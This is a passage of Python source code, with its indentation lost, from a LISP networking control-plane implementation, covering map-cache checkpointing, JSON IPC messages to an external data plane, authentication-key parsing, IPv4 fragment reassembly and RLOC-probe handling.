# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
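#
# Illustrative checkpoint entries (addresses are made up), matching the
# format described above:
#
#   [1000]10.1.0.0/16 rloc 192.168.1.2 1 50, 192.168.2.2 1 50
#   [1000]10.2.0.0/16 rloc native-forward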
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Write a JSON record to the lisp-ipc-data-plane named socket.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_list has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
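#
# Illustrative JSON record written for a unicast map-cache entry (values are
# made up):
#
#   { "type" : "map-cache", "opcode" : "add", "instance-id" : "1000",
#     "eid-prefix" : "10.1.0.0/16", "rlocs" : [ { "rloc" : "192.168.1.2",
#     "priority" : "1", "weight" : "100", "port" : "4341" } ] }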
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr (or lisp-rtr) process, write a decap-keys record for an RLOC
# to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
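#
# Illustrative result when called with key_type "encrypt-key" (key strings
# are made up); when ekey is None the entry is returned unchanged:
#
#   entry["keys"] = [ { "key-id" : "1", "encrypt-key" : "<ekey>",
#                       "icv-key" : "<ikey>" } ]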
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write the database-mappings and the ETR's ephemeral
# NAT port to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
    # Write record in JSON format.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# Write the configured interface-to-instance-id records to the ipc-data-plane
# socket. This is not done in the lisp-etr process.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
    # Write record in JSON format.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return an auth_key{} dictionary where the keys are type integer and the
# values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
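#
# Illustrative examples of the parsed return value:
#
#   lisp_parse_auth_key("secret")        returns { 0 : "secret" }
#   lisp_parse_auth_key("[1]foo[2]bar")  returns { 1 : "foo", 2 : "bar" }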
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
    # Initialize list if first fragment. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
    # Do not queue fragment if first fragment arrived and we determined it's
# not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
    # IP header in the first fragment but remove it from the other fragments.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr> in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
    # We are at a non-NAT based xTR. We need to get the keys from an RTR
    # or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
        # Have to check the NAT cache to see if the RLOC is translated. If
        # not, this is an xTR in public space. We'll have to change this in
        # the future so we don't do a full table traversal.
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR, we
# need to send an IPC message to the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
    # Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
    # is a dictionary array when the ITR/RTR is processing msg. When an ETR
    # is processing it, it received a JSON string from the ITR so it needs
    # to convert it to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The formats of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls helper functions for the stats and restart
# types but itself processes the logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# And:
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x:q to x.x.x.x. This is an expensive function, but it is hardly
# used, and once it is used for a particular addr_str it shouldn't be needed
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
    #endfor
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
